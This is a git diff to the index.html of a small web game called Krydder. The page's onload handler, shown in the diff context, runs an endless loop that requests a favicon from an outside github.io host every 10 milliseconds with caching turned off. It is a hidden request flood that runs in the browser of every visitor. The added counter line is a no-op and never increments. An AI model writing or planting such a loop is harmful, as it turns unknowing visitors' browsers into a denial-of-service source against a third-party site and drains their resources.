diff --git a/Games/Krydder/index.html b/Games/Krydder/index.html index fc56de6..1bf7c2b 100644 --- a/Games/Krydder/index.html +++ b/Games/Krydder/index.html @@ -16,10 +16,12 @@ setTimeout(resolve, milliseconds); }); } + var timesdown = 0 window.onload = async function startdown(){ while(true) { await delay(10); fetch('https://t0m0t0w.github.io/favicon.png', {cache: "no-store"}) + timesdown + 1 } } let speed = 1000